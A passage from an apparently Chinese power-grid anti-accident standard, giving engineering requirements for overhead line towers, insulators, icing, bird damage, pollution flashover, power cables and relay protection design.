撞措施;对机械化耕种区的拉线塔,宜改造为自立式铁塔。 15.1.17 混凝土电杆基础埋置深度不应小于0.5m,对于坡道、河边等易造成 冲刷,或埋深无法满足的电杆,应采取加固措施。 15.1.18 利用已有杆塔立(撤)杆的线路改造及迁移项目,需对铁塔(杆) 结构和基础进行鉴定和复核计算,必要时增设临时拉线等补强措施,并采取安全 可靠的施工组织措施防止杆塔结构损坏。 15.2 防止断线事故 15.2.1 应加强施工质量管控,防止放线、紧线、压接金具、挂线及安装附件 时损伤导地线。 15.2.2 110kV及以下线路的光纤复合架空地线(OPGW)的外层线股应选取 单丝直径2.8mm及以上的铝包钢线;220kV及以上线路应选取3.0mm及以上的铝 包钢线。 15.2.3 加强对大跨越线路的运行管理,按期进行导地线测振,发现动弯应变 值超标时应及时分析、处理。 15.2.4 对于腐蚀严重区域的线路,应根据导地线运行情况进行鉴定性试验; 出现多处严重锈蚀、散股、断股、表面氧化时,宜换线。 15.2.5 预绞式金具的使用应加强施工质量管控,确保预绞丝与被接续线股紧 密连接;跳线的接续不应采用预绞式金具。 15.2.6 大风频发区域,宜采用预绞丝护线条,降低导线振动疲劳受损风险。 15.3 防止绝缘子和金具断裂事故 15.3.1 设计阶段,大风频发区域的悬垂线夹和连接金具应选用耐磨型金具; 重冰区应考虑脱冰跳跃对金具的影响;舞动区应考虑舞动对金具的影响。 15.3.2 不应反装复合绝缘子的均压环,不应将均压环安装于护套上。作业时 应避免损伤复合绝缘子伞裙、护套及端部密封,不应脚踏复合绝缘子。 15.3.3 设计阶段,500(330)kV 及以上线路的悬垂复合绝缘子串应采用双 联及以上设计,且单联应满足断联工况荷载的要求。 15.3.4 设计阶段,跨越110kV(66kV)及以上线路、铁路、等级公路、通航 河流及居民区的线路直线塔悬垂串应采用双联设计,宜采用双挂点,且单联应满 145 足断联工况荷载的要求。 15.3.5 基建阶段,对于耐张绝缘子串倒挂的耐张线夹,应采取填充电力脂或 线夹尾部打渗水孔等防积水冻胀措施。 15.3.6 应基于复合绝缘子的实际运行效果,合理降低伞套电蚀性和阻燃性, 实现伞套硅橡胶含量的大幅度提高及复合绝缘子运行寿命的有效提升。 15.3.7 新建500kV及以上线路的V串和跳串复合绝缘子宜采用环式连接金 具,但应确保金具连接方向的匹配。 15.3.8 对于新建特高压输电工程的420kN及以上盘形悬式瓷绝缘子,每个制 造商、每个型号的产品应随机选择一个抽检批次进行热机试验。 15.3.9 高温大负荷期间应开展红外测温,重点检测接续管、耐张线夹、引流 板、并沟线夹、导线修补部位、地线接地螺栓等金具的发热情况,发现缺陷应及 时处理。 15.3.10 加强对导、地线悬垂线夹承重轴磨损情况的检查,导地线振动严重 区段应按2年周期打开检查,磨损严重的应予更换。 15.3.11 应加强锁紧销运行状况的检查,锈蚀严重及失去弹性的应及时更换; 应重点加强V串复合绝缘子锁紧销的检查,防止因锁紧销受压变形、失去锁紧效 果而导致掉串事故。 15.3.12 加强瓷绝缘子的检测,及时更换零、低值瓷绝缘子及自爆玻璃绝缘 子。加强复合绝缘子护套和端部金具连接部位的检查,应及时更换端部密封破损 及护套严重损坏的复合绝缘子。 15.3.13 应按周期开展运行复合绝缘子的抽检试验,其中应包括芯棒应力腐 蚀试验。 15.3.14 应加强特高压输电工程的盘形悬式瓷绝缘子性能跟踪,每个制造商、 每个型号的产品应在投运2~4年期间抽取不少于8片绝缘子进行机电破坏负荷试 验,破坏值应不小于绝缘子额定机械强度。 15.3.15 防振锤、间隔棒发生移位和脱落,架空绝缘地线绝缘子间隙发生放 电,应及时处理。 15.4 防止风偏闪络事故 15.4.1 设计阶段应结合周边气象台站资料及风区分布图,并参考已有线路的 146 运行经验确定架空线路设计风速;对于山谷、垭口等微地形、微气象区,应加强 风偏校核,必要时采取进一步的防风偏措施。 15.4.2 新建330~750kV 架空线路40°以上转角塔的外侧跳线应加装双串绝 缘子及重锤;40°以下且15°以上的转角塔的外侧跳线应加装绝缘子及重锤;15° 以下的转角塔的内外侧跳线均应加装绝缘子及重锤。 15.4.3 新建110~220kV架空线路20°以上转角塔的外侧跳线应加装绝缘子及 重锤;20°以下的转角塔的内外侧跳线均应加装单串绝缘子及重锤。 15.4.4 运行单位应加强通道周边新增构筑物、各类交叉跨越及山区线路大档 距侧边坡、树木的排查,对于影响线路安全运行的隐患应及时治理。 15.4.5 线路风偏故障后,应注意收集故障发生时微气象、微地形信息和放电 特征,开展风偏原因分析和校核,并应检查导线、金具、铁塔等受损情况,及时 消缺和整改。 15.4.6 更换不同型式的悬垂绝缘子串后,应重新校核导线风偏角及弧垂。 15.4.7 沿海强风区的老旧线路应进行防风能力评估,并结合评估结果开展防 风改造。沿海强风区的重要输电线路及微气象、微地形区域的杆塔宜配置气象在 线监测装置。 15.5 防止覆冰、舞动事故 15.5.1 设计阶段,线路路径选择应以冰区分布图、舞动区域分布图为重要参 考,宜避开重冰区及舞动易发区;3级舞动区不应采用紧凑型线路设计,并应采 取全塔双螺母防松措施。 15.5.2 不能避开重冰区或舞动易发区的新建线路,宜避免大档距、大高差和 杆塔两侧档距相差悬殊等设计形式。 15.5.3 对于重冰区和舞动易发区的新建线路,瓷绝缘子串或玻璃绝缘子串的 联间距宜适当增加,必要时可安装联间支撑间隔棒。 15.5.4 设计阶段,110kV及以上线路因舞动发生过相间放电的区段,应采用 线夹回转式间隔棒、相间间隔棒等防舞产品及措施;对于舞动频繁区段,宜安装 舞动在线监测装置。 15.5.5 15mm及以上冰区且同时为c级及以上污区并发生过冰闪的线路,导 线悬垂串宜采用V型、八字型、大小伞插花I型绝缘子串、防覆冰复合绝缘子等。 147 15.5.6 重冰区的220kV及以上线路和110kV重要线路应结合实际、按轻重缓 急逐步配置融冰装置,且线路两侧均应配置融冰刀闸,固定式直流融冰装置所在 变电站应配置覆盖所有需融冰110kV及以上线路的融冰母线;但穿越冰区区段较 短的线路经论证后可不配置融冰装置。曾因冰灾受损且未加固、无融冰功能的输 电线路,应结合实际、按轻重缓急逐步进行防冰加固改造或配置融冰装置。 15.5.7 加强导地线覆冰、舞动的观测,对覆冰及舞动易发区,应合理安装在 线监测装置及设立观冰站(点),加强沿线气象环境资料的调研搜集,及时修订 冰区分布图和舞动区域分布图。 15.5.8 对设计冰厚取值偏低,且未采取必要防冰害措施的中、重冰区线路, 应采取增加直线塔、缩短耐张段长度或合理补强杆塔等措施。 15.5.9 防舞治理应综合考虑线路的微风振动性能,避免因采取防舞动措施而 造成导线动弯应变超标;同时应加强防舞效果的观测和防舞装置的维护。 15.5.10 覆冰季节前应对线路做全面检查,落实除冰、融冰和防舞动措施。 15.5.11 具备融冰条件的线路覆冰后,应根据覆冰厚度和天气情况,对导线 及时采取融冰措施以消除或减轻导线覆冰。冰雪消融后,对已发生倾斜的杆塔应 加强监测,可根据需要在直线杆塔上设立临时拉线以加强杆塔的抗纵向不平衡张 力能力。 15.5.12 线路发生覆冰、舞动后,应结合实际安排停电检修,对线路覆冰、 舞动重点区段的杆塔螺栓、线夹出口处导地线、绝缘子锁紧销及相关金具进行检 查和消缺;及时校核和调整因覆冰、舞动造成的导地线滑移引起的弧垂变化缺陷。 15.6 防止鸟害闪络事故 15.6.1 对于66~500kV新建线路,应结合涉鸟故障风险分布图,对于鸟害多 发区采取有效的防鸟措施,如安装防鸟刺、防鸟挡板、防鸟针板,增加绝缘子串 结构高度等。110(66)、220、330、500kV悬式绝缘子的鸟粪闪络基本防护范 围为以绝缘子悬挂点为圆心,半径分别为0.25m、0.55m、0.85m、1.2m的圆。 15.6.2 鸟害多发区线路应及时安装防鸟装置,如防鸟刺、防鸟挡板、悬垂串 第一片绝缘子采用大盘径绝缘子、复合绝缘子横担侧采用防鸟型均压环等。对于 已安装的防鸟装置,应加强检查和维护,及时更换失效防鸟装置。 15.6.3 及时拆除绝缘子及导线上方可能危及线路运行的鸟巢,并及时清扫鸟 148 粪污染的绝缘子。 15.6.4 线路施工阶段,出现护套损伤的复合绝缘子,应在线路投运前更换。 15.7 防止外力破坏事故 15.7.1 新建线路设计时应采取必要的防盗、防撞等防外力破坏措施,验收时 应检查防外力破坏措施是否落实到位。 15.7.2 架空线路采用高跨设计跨越森林、防风林、固沙林、河流坝堤的防护 林、高等级公路绿化带、经济园林时,应满足对主要树种自然生长高度的距离要 求。 15.7.3 新建线路宜避开山火易发区;不能避让时,宜采用高跨设计,并适当 提高安全裕度;不能采用高跨设计时,重要线路应按相关标准清理通道。 15.7.4 应建立完善的通道属地化制度,积极配合当地公安机关及司法部门, 严厉打击破坏、盗窃、收购线路器材的违法犯罪活动。 15.7.5 加强巡视和宣传,及时制止线路附近的烧荒、烧秸秆、放风筝、爆破 作业、大型机械施工、非法采沙等可能危及线路安全运行的行为,组织人员向当 地群众宣传防山火和外力破坏知识,提高沿线群众防山火和外力破坏意识,严防 相关事故发生。 15.7.6 应在线路保护区或附近的公路、铁路、水利、市政施工现场等可能引 起误碰线或因距离不足可能造成导线放电的区段设立限高警示牌或采取其它有 效措施,防止吊车、打桩机、架桥机等大型施工机械碰线。 15.7.7 及时清理线路通道特别是密集输电通道内的树障、堆积物等,严防因 树木、堆积物与线路距离不足引起放电事故;及时清理或固定线路通道内彩钢瓦、 大棚薄膜、遮阳网等易飘浮物。 15.7.8 对易遭外力碰撞的线路杆塔,应设置防撞墩(墙)、并设置醒目标志。 15.7.9 重要线路、存在电网事故风险的重要交叉跨越及重要同走廊线路区段 中的山火高风险隐患点宜安装山火在线监测装置;重要线路的外力破坏隐患点、 存在电网事故风险的重要交叉跨越宜安装具有前端识别功能的图像/视频在线监 测装置。 15.7.10 发生山火的线路区段应进行复合绝缘子、瓷绝缘子和玻璃绝缘子的 受损和积污等检查,必要时进行更换或清扫。 149 15.7.11 宜应用北斗卫星、视频监测、无人机等技术,全方位开展山火监测 和风险预警,提升山火隐患防治的科技水平。 15.7.12 开展输电人员防山火知识技能培训和应急演练,掌握森林草原火灾 常识、国家相关法律法规,切实提升人员防山火技能水平,确保现场处置过程人 身安全。 15.8 防止“三跨”事故 15.8.1 线路路径选择时,宜减少“三跨”(“三跨”是指跨越高速铁路、高速 公路和重要输电通道的架空输电线路区段)数量,且不宜连续跨越;跨越重要输 电通道时,不宜在一档中跨越3条及以上输电线路,且不宜在杆塔顶部跨越。 15.8.2 新建“三跨”线路与高铁交叉角不宜小于45°,存在困难时亦不应小于 30°,且不应在铁路车站出站信号机以内跨越;与高速公路交叉角一般不应小于 45°;与重要输电通道交叉角不宜小于30°。线路改造路径受限时,可按原路径设 计。 15.8.3 新建“三跨”宜避免大档距和大高差的情况,跨越塔两侧档距之比不宜 大于2。 15.8.4 新建线路“三跨”跨越点宜避开2级和3级舞动区;无法避开时,应以舞 动区域分布图为依据,并结合附近舞动发生情况及舞动条件发展情况,适当提高 防舞设防水平。 15.8.5 新建“三跨”应采用独立耐张段跨越;杆塔结构重要性系数应不低于 1.1;除必要的防盗措施外,杆塔应采用全塔防松措施;跨越重要输电通道时, 跨越线路设计标准应不低于被跨越线路。 15.8.6 设计阶段,对于15mm及以上冰区的特高压“三跨”,导线最大设计验 算覆冰厚度应比同区域常规线路增加10mm,地线设计验算覆冰厚度应增加 15mm;对于覆冰区其它电压等级“三跨”,导线最大设计验算覆冰厚度应比同区 域常规线路增加10mm,地线设计验算覆冰厚度应增加15mm;对历史上曾出现 过超设计覆冰的地区,还应按稀有覆冰条件进行验算。 15.8.7 设计阶段,重覆冰区悬垂串应避免使用上扛式线夹。 15.8.8 设计阶段,“三跨”跨越档距大于200m时,导线弧垂应按照导线允许 温度进行计算。 150 15.8.9 防舞动装置(不含线夹回转式间隔棒)安装位置应避开被跨越物。 15.8.10 设计阶段,500千伏及以下“三跨”的悬垂绝缘子串应采用独立双串, 对于大高差、连续上下山的线路区段可采用单挂点双联;耐张绝缘子应采用双联 及以上结构形式,且单联强度应满足正常运行状态下的荷载要求。“三跨”地线悬 垂应采用独立双串设计,耐张串连接金具应提高一个强度等级,不具备独立双串 改造条件时,应采取防掉串后备保护措施。 15.8.11 设计阶段,风振严重区、舞动易发区“三跨”的导地线用保护及连接 金具,应选用耐磨型产品。 15.8.12 设计阶段,跨越高铁时应安装分布式故障诊断装置和视频监控装置; 跨越高速公路和重要输电通道时应安装图像或视频监控装置。对于不均匀沉降、 强风、易覆冰等微地形、微气象区域的线路,宜安装状态监测装置。 15.8.13 设计和基建阶段,“三跨”导线应选择技术成熟、运行经验丰富的产 品,地线宜采用铝包钢绞线,光缆宜选用全铝包钢结构的光纤复合架空地线 (OPGW)。 15.8.14 对于新建特高压线路的“三跨”,跨越档内导、地线不应有接头;其 它电压等级的“三跨”,耐张段内导、地线不应有接头。 15.8.15 新建及改建“三跨”金具压接质量应按照施工验收规定逐一检查,且 应按照“三跨”段内不低于耐张线夹总数量10%的比例,开展X射线无损检测。 15.8.16 对于跨越铁路、一级及以上公路、人口密集区域等易引发公共危害 的线路杆塔,标志牌等应可靠固定。 15.8.17 跨越在运线路施工时,设备运维单位应参与技术方案审查,督促施 工单位落实必要的防护措施,保障在运线路安全。 15.8.18 跨越段存在外力破坏隐患时,应采取人防、物防和技防等多种防护措 施。 15.8.19 在运特高压交直流线路跨越高速公路、重要输电通道不满足独立耐 张段要求的,可不改造。 15.8.20 在运110~750千伏交流、±400~±660千伏直流线路跨越高速公路匝道 不满足独立耐张段要求的,可不改造。 15.8.21 在运330~750千伏交流、±400~±660千伏直流线路跨越高速公路、 151 重要输电通道不满足独立耐张段要求,当存在以下四种情形时,应改造为独立耐 张段:(1)轻冰区耐张段长度超过10km、中冰区耐张段长度超过5km、重冰区 耐张段长度超过3km;(2)耐张段内存在拉线杆(塔);(3)跨越段位于2级和3 级舞动区;(4)跨越耐张段内曾发生过脱冰跳跃、舞动、重覆冰、强风等导致 的倒塔、掉串、断线、金具严重损伤的线路。除以上情形外,跨越耐张段内不存 在影响被跨越物安全的其他隐患时,可不改造。 15.8.22 跨越高速公路、重要输电通道的在运110 (66)千伏、220千伏线路, 不满足独立耐张段要求的,应进行改造。 15.8.23 在运“三跨”线路压接点,应根据需要,结合停电检修开展耐张线夹X 射线等无损探伤检测,根据检测结果及时消缺,相关检测结果(探伤报告、X光 片等)及消缺情况应存档备查。 15.8.24 在运“三跨”红外测温周期应不超过3个月,当环境温度达到35℃或当 输送功率超过额定功率的80%时,应开展红外测温和弧垂测量。 15.8.25 报废线路的“三跨”应及时拆除,退运线路的“三跨”应纳入正常运维 范围。 15.8.26在运线路“三跨”的常规巡视周期应不超过1个月,在恶劣天气或地质 灾害发生后应进行特殊巡视。 16 防止污闪事故的重点要求 16.1 新、改(扩)建输变电设备的外绝缘配置应以最新版污区分布图为基 础,综合考虑环境、气象、污秽发展和运行经验等因素确定。线路设计时,交流 c级以下污区外绝缘按c级配置;c、d级污区按相应污级上限配置;e级污区按实 际情况配置,并适当留有裕度。变电站设计时,c级以下污区外绝缘按c级配置; c、d级污区根据环境情况适当提高配置;e级污区按实际情况配置。 16.2 设计阶段,对于饱和等值盐密大于0.35mg/cm2的污区,应单独校核外绝 缘配置。特高压交直流工程宜开展专项沿线污秽调查以确定外绝缘配置。 16.3 设计和基建阶段,应选用合理的绝缘子材质和伞形。中重污区变电站 悬垂串宜采用复合绝缘子或外伞形绝缘子,中重污区支柱绝缘子、组合电器宜采 用硅橡胶外绝缘。变电站站址应尽量避让交流e级区,如不能避让,变电站宜采 152 用GIS、HGIS设备或全户内变电站。中重污区输电线路悬垂串及220kV及以下电 压等级耐张串宜采用复合绝缘子,330kV及以上电压等级耐张串宜采用瓷或玻璃 绝缘子。 16.4 对于复合绝缘子、防污闪辅助伞裙等高温硫化硅橡胶类外绝缘,宜在 现行标准基础上适当降低伞套和伞裙的电蚀损性和阻燃性,相应提高硅橡胶含 量,以有效延长产品运行寿命。 16.5 设计阶段,易发生覆冰闪络、湿雪闪络或大雨闪络地区的外绝缘配置 宜采用V型串、不同盘径绝缘子组合或加装辅助伞裙等。 16.6 设计和基建阶段,粉尘污染严重地区的外绝缘宜选用自洁能力强的绝 缘子,如外伞形绝缘子,变电设备可采取加装辅助伞裙等措施。用于沿海、盐湖、 水泥厂和冶炼厂等特殊区域的玻璃绝缘子及瓷绝缘子,应涂覆防污闪涂料。硅橡 胶类外绝缘用于苯、酒精类等化工厂附近时,应提高绝缘配置水平。 16.7 设计阶段,安装在非密封户内的设备外绝缘设计应考虑户内场湿度和 实际污秽度,与户外设备外绝缘的污秽等级差异不宜大于一级。 16.8 设计和基建阶段,瓷或玻璃绝缘子安装前需涂覆防污闪涂料时,宜采 用工厂复合化工艺,运输及安装时应注意避免绝缘子涂层擦伤。 16.9 盘形悬式瓷绝缘子安装前,应在现场逐个进行零值检测。 16.10 根据“适当均匀、总体照顾”的原则,采用“网格化”方法开展饱和污秽 度测试布点,兼顾疏密程度、兼顾未来电网发展。局部重污染区、特殊污秽区、 重要输电通道、微气象区、极端气象区等特殊区域应增加布点。根据标准要求开 展污秽取样及测试。 16.11 应以现场污秽度为主要依据,结合运行经验、污湿特征,考虑连续无 降水日的大幅度延长等影响因素定期开展污区分布图修订。污秽等级变化时,应 及时进行外绝缘配置校核。 16.12 对外绝缘不满足防污闪配置要求的输变电设备应进行治理,措施包括 增加绝缘子片数、更换防污绝缘子、涂覆防污闪涂料、更换复合绝缘子、加装辅 助伞裙等。 16.13 清扫作为辅助性防污闪措施,可用于暂不满足防污闪配置要求的输变 电设备及污染特殊严重区域的输变电设备。 153 16.14 出现快速积污、连续无降水日大幅度延长或外绝缘暂不满足防污闪配 置要求,且可能发生污闪时,可采取带电清扫(含带电水冲洗)、直流线路降压 运行等紧急防污闪措施。 16.15 绝缘子上方金属部件严重锈蚀造成绝缘子表面污染,或绝缘子表面覆 盖藻类、苔藓等可能造成闪络时,应及时进行处理。 16.16 在大雾、毛毛雨、覆冰(雪)等易污闪条件下,宜加强特殊巡视,且 可采用红外热成像、紫外成像等辅助手段判定外绝缘运行状态。 16.17 对于水泥厂、有机溶剂类化工厂等特殊污源附近的硅橡胶类外绝缘, 应加强憎水性检测。 16.18 对于现场涂覆的防污闪材料,应确保绝缘子表面清扫质量、涂层厚度、 附着力符合要求,且应避免在大雾、阴雨潮湿天气施工。 16.19 瓷套避雷器不宜单独加装辅助伞裙,如需加装辅助伞裙宜将辅助伞裙 与防污闪涂料结合使用。 17 防止电力电缆损坏事故的重点要求 17.1 防止电缆绝缘击穿事故 17.1.1 应根据线路输送容量、系统运行条件、电缆路径、敷设方式、环境条 件等合理选择电缆和附件结构型式及相关材料。 17.1.2 应避免电缆通道邻近热力管线、腐蚀性、易燃易爆介质的管道,确实 不能避开时,电缆通道与其他管道、道路、建筑物等之间平行和交叉时的最小净 距应符合相关标准要求。 17.1.3 应加强电力电缆和电缆附件选型、订货、验收及投运的全过程管理。 应优先选择具有良好运行业绩和成熟制造经验的制造商。 17.1.4 同一受电端的双回或多回电缆线路宜选用不同制造商的电缆、附件。 人员密集区域或有防爆要求场所的新建电缆线路户外终端应选择复合套管终端。 17.1.5 设计阶段应充分考虑耐压试验作业空间、安全距离,在GIS电缆终端 与线路隔离开关之间宜配置试验专用隔离开关,并根据需求配置GIS试验套管。 110(66)kV及以上采用电缆进出线的GIS,宜预留电缆试验、故障测寻用的高 压套管连接位置并考虑足够的作业空间。GIS电缆终端尾管与GIS筒之间应设计 154 过电压限制元件。 17.1.6 110(66)kV及以上电力电缆站外户外终端应有检修平台。终端塔应 有围墙(围栏),并有监控等技防措施。 17.1.7 10kV及以上电力电缆应采用干法化学交联的生产工艺,110(66)kV 及以上电力电缆应采用悬链或立塔式工艺。 17.1.8 运行在潮湿或浸水环境中的110(66)kV及以上电压等级的电缆应有 纵向阻水功能,电缆附件应密封防潮;35kV及以下电压等级电缆附件的密封防 潮性能应能满足长期运行需要。 17.1.9 电缆主绝缘、单芯电缆的金属屏蔽层、金属护层应有可靠的过电压保 护措施。统包型电缆的金属屏蔽层、金属护层应两端直接接地。 17.1.10 合理安排电缆段长,减少电缆接头的数量,严禁在变电站电缆夹层、 竖井、50米及以下桥架等缆线密集区域布置电力电缆接头。110(66)kV电缆线 路在非开挖定向钻拖拉管两端工作井内不应布置电力电缆接头。 17.1.11 重要电力电缆及通道应合理部署状态监测装置,掌握运行状态。 17.1.12 对220kV及以上电压等级电缆、110(66)kV及以下电压等级重要线 路的电缆,应进行工厂验收。 17.1.13 应严格进行到货验收,并开展到货检测。 17.1.14 在电缆运输过程中,应防止电缆受到碰撞、挤压等导致的机械损伤, 严禁平放电缆盘。电缆敷设过程中应严格控制牵引力、侧压力和弯曲半径。 17.1.15 电缆通道、夹层及管孔等应满足电缆弯曲半径的要求,110(66)kV 及以上电缆的支架应满足电缆蛇形敷设的要求,支架立柱部分不应采用角钢以避 免硌伤电缆,1600mm2截面及以上电缆的支架横撑应采用非铁磁性材料。电缆应 严格按照设计要求进行敷设、固定。110(66) kV及上电压等级电缆接头两侧端部、 终端下部应采用刚性固定。电缆支架、固定金具等均应可靠接地。 17.1.16 施工期间应做好电缆和电缆附件的防潮、防尘、防外力损伤措施。 在现场安装高压电缆附件之前,其组装部件应试装配。安装现场的温度、湿度和 清洁度应符合安装工艺要求,严禁在雨、雾、风沙等有严重污染的环境中安装电 缆附件。加强高压电缆附件安装的过程管理,严格按照说明书进行施工,对于重 要工序应进行影像记录。 155 17.1.17 应检测电缆金属护层接地电阻、接地箱(互联箱)端子接触电阻, 阻值必须满足设计要求和相关技术规范要求。 17.1.18 金属护层采取交叉互联方式时,应逐相进行导通测试,确保连接方 式正确。金属护层对地绝缘电阻应试验合格,过电压限制元件在安装前应检测合 格。 17.1.19 电缆支架、固定金具、排管的机械强度应符合设计和长期安全运行 的要求,且无尖锐棱角。户外终端应采取措施避免杆塔沉降,电缆引上直埋部分 应填砂掩埋。 17.1.20 110(66) kV及以上电缆穿越桥梁等振动较为频繁的区域时,应采用可 缓冲机械应力的固定装置。 17.1.21 电缆终端尾管应采用封铅方式,可加装铜编织线连接尾管和金属护 套以确保等电位。 17.1.22 运维部门应加强电缆线路负荷和温度的检(监)测,防止过负荷运 行,多条并联的电缆应分别进行测量。巡视过程中应重点检测电缆附件、接地系 统等的关键接点的温度。 17.1.23 严禁金属护层不接地运行。应严格按照试验规程对电缆金属护层的 接地系统开展运行状态检测、试验。 17.1.24 运维部门应每年开展电缆线路状态评价,对异常状态和严重状态的 电缆线路应及时检修。对重要电缆及通道应开展带电检测或在线监测,掌握运行 状态。 17.1.25 应监视重载和重要电缆线路因运行温度变化产生的伸缩位移,出现 异常应及时处理。 17.1.26 电缆线路发生运行故障后,应检查接地系统是否受损,发现问题应 及时修复。 17.1.27 人员密集区域或有防爆要求场所的存量瓷套终端应更换为复合套管 终端。 17.2 防止电缆火灾事故 17.2.1 新、扩建工程中的电缆设计应有防火设计要求。电缆通道的防火设施 必须与主体工程同时设计、同时施工、同时验收。电缆通道应有防火、排水、通 156 风的措施。 17.2.2 同一电源的110(66)kV及以上电压等级电缆线路宜选用不同通道, 同通道敷设时应两侧布置。同一通道内不同电压等级的电缆,应按照电压等级的 高低从下向上排列,分层敷设在电缆支架上。110(66)kV及以上电压等级电缆 进出线口,应与10kV电缆进出线口分开设置。新建重要枢纽变电站动力电缆和 控制电缆应分通道敷设。 17.2.3 新建110(66)kV及以上电压等级电缆线路在隧道、电缆沟、变电站 内、桥梁内应选用阻燃电缆,其成束阻燃性能应不低于C级。与电力电缆同通道 敷设的低压电缆、控制电缆、通讯光缆等选用不低于C级阻燃等级并采取穿入阻 燃管或其他防火隔离措施。 17.2.4 中性点非有效接地方式且允许带故障运行的新建电力电缆线路不宜 与110kV及以上电压等级电缆线路共用隧道、电缆沟、综合管廊电力舱。 17.2.5 在安全性要求较高的电缆密集区域,应设置火灾自动报警系统和自动 灭火装置。变电站夹层应安装温度、烟气监视报警器,重要的电缆隧道应安装温 度在线监测装置,并应定期传动、检测,确保动作可靠、信号准确。 17.2.6 存在延燃风险的隧道、电缆沟、竖井、桥架等应合理设置防火门、防 火墙等阻火分隔封堵措施。 17.2.7 非直埋电缆接头的最外层应包覆阻燃材料。充油电缆应全线采用防火 槽盒封闭或埋沙。密集区域的电缆接头应选用防火槽盒、防火隔板、防火毯、防 爆壳等防火防爆隔离措施。 17.2.8 扩建工程敷设电缆时,应与运维单位密切配合,在电缆通道内敷设电 缆需经运维部门许可。施工过程中产生的电缆孔洞应加装防火封堵,受损的防火 设施应及时恢复,并由运维部门验收。 17.2.9 隧道、竖井、变电站电缆层应采取防火墙、防火隔板及封堵等防火措 施。防火墙、阻火隔板和阻火封堵应满足耐火极限不低于1h的耐火完整性、隔热 性要求。 17.2.10 电缆密集区域的在役接头应加装防火槽盒或采取其他防火隔离措 施。输配电电缆同通道敷设应采取可靠的防火隔离措施。变电站夹层内在役接头 应逐步移出,电力电缆切改或故障抢修时,应将接头布置在站外的电缆通道内。 157 17.2.11 运维部门应保持电缆通道、夹层整洁、畅通,消除各类火灾隐患, 通道沿线及其内部、隧道通风口(亭)外部不得积存易燃、易爆物。 17.2.12 电缆通道临近易燃或腐蚀性介质的存储容器、输送管道时,应加强 监视,防止其渗漏进入电缆通道,进而损害电缆或导致火灾。 17.2.13 在电缆通道、夹层内动火作业应办理动火工作票,并采取可靠的防 火措施。在电缆通道、夹层内使用的临时电源应满足绝缘、防火、防潮要求。工 作人员撤离时应立即断开电源。 17.2.14 严格按照运行规程规定对电缆夹层、通道进行定期巡检,并检测电 缆和附件关键部位运行温度。 17.2.15 与110(66)kV及以上电压等级电缆线路共用隧道、电缆沟、综合 管廊电力舱的存量的中性点非有效接地方式的电力电缆线路,应开展中性点接地 方式改造或逐步疏导至其他通道,或做好防火隔离措施并在发生接地故障时立即 拉开故障线路。 17.2.16 3~66kV中性点不接地系统发生单相接地故障时,一次设备应能快速 响应,防止电缆着火、事故扩大。变电站3~66kV各段母线,因地制宜配置主动 干预型消弧装置。 17.3 防止外力破坏和设施被盗 17.3.1 同一受电端的的双路或多路电缆宜选用不同通道,同通道敷设时应两 侧布置。 17.3.2 电缆线路路径、附属设备及设施(地上接地箱、出入口、通风亭等) 的设置应通过规划部门审批。应避免电缆通道邻近热力管线、易燃易爆管线(输 油、燃气)和腐蚀性介质的管道。综合管廊中110(66)千伏及以上电缆线路应 采用独立舱体建设。电力舱不宜与天然气管道舱、热力管道舱紧邻布置。 17.3.3 电缆终端站、隧道出入口、重要区域的工井井盖应设置视频监控、门 禁、井盖监控等安防措施。 17.3.4 建立与规划部门和其他管线单位的联动和信息沟通共享机制。 17.3.5 电缆通道及直埋电缆线路工程、水底电缆敷设应严格按照相关标准和 设计要求施工,并同步进行竣工测绘,非开挖工艺的电缆通道应进行三维测绘。 应在投运前向运维部门提交竣工资料和图纸。 158 17.3.6 直埋电缆沿线、水底电缆应装设永久标识或路径感应标识。电缆接头 处、转弯处、进入建筑物处应设置明显方向桩或标桩。 17.3.7 电缆终端场站、隧道出入口、重要区域的工井井盖应有安防措施,并 宜加装在线监控装置。户外金属电缆支架、电缆固定金具等应使用防盗螺栓。 17.3.8 电缆路径上应设立明显的警示标志,对可能发生外力破坏的区段应加 强监视,并采取可靠的防护措施。 17.3.9 工井正下方的电缆,宜采取防止坠落物体打击的保护措施。 17.3.10 应监视电缆通道结构、周围土层和临近建筑物等的稳定性,发现异 常应及时采取防护措施。 17.3.11 敷设于公用通道中的电缆应制定专项管理措施。通道内所有电力电 缆及光缆应明确设备归属及运维职责。对盗窃易发地区的电缆设施应加强巡视, 接地箱(互联箱)、工井盖等应采取相应的技防措施。 17.3.12 应及时清理退运的报废缆线,对盗窃易发地区的电缆设施应加强巡 视。 17.3.13 临近大型施工现场的电缆通道宜采用视频监控、光纤振动等技防措 施,减少外力破坏发生。因施工原因裸露的电缆线路应采取保护措施,并加强特 巡或在施工期间安排人员看护。 17.3.14 对于电缆通道与燃气、污水、热力等其他管线临近、交叉敷设不满 足国标净距要求的情况,应与政府部门主动协商,划清责任界限,商定整改方案, 消除安全隐患。 18 防止继电保护及安全自动装置事故的重点要求 18.1 规划设计阶段的重点要求 18.1.1 涉及电网安全、稳定运行的发、输、变、配及重要用电设备的继电保 护装置应纳入电网统一规划、设计、运行、管理和技术监督。在一次系统规划建 设中,应充分考虑继电保护的适应性,避免出现特殊接线方式造成继电保护配置 及整定难度的增加。 18.1.2 继电保护及安全自动装置的设计、配置和选型,必须满足有关规程规 定的要求,并经相关继电保护管理部门同意。继电保护及安全自动装置选型应采 159 用技术成熟、性能可靠、质量优良、经有资质的专业检测机构检测合格的产品。 18.1.3 稳控系统应在合理的电网结构和电源结构基础上规划、设计和运行, 控制策略和措施应安全可靠、简单实用。对无法采取稳定控制措施保持系统稳定 的情况,应通过完善网架方案、优化运行方式、完善第三道防线方案等综合措施, 共同降低并控制系统运行风险。 18.1.4 继电保护及安全自动装置应符合网络安全防护规定,满足《电力监控 系统安全防护规定(国家发展改革委2014年第十四号令)》及《电力监控系统网 络安全防护导则》(GBT 36572)要求。 18.1.5 220kV及以上电压等级线路、变压器、母线、高压电抗器、串联电容 器补偿装置等交流输变电设备的保护及电网安全稳定控制装置应按双重化配置。 18.1.6 依照双重化原则配置的两套保护装置,每套保护均应含有完整的主、 后备保护功能,能反应被保护设备的各种故障及异常状态,并能作用于跳闸或给 出信号。 18.1.7 220kV及以上电压等级输电线路(含电铁牵引站及引入线路)两端均 应配置双重化线路纵联保护,两套保护的通道应相互独立,优先采用纵联电流差 动保护,双侧均应具备远方跳闸功能;具备条件的110(66)kV输电线路(含电 铁牵引站及引入线路)宜配置纵联电流差动保护。 18.1.8 继电保护及安全自动装置的通讯通道应采用安全可靠的传输方式,线 路纵联保护应优先采用光纤通道。220kV及以上电压等级线路纵联保护的通道 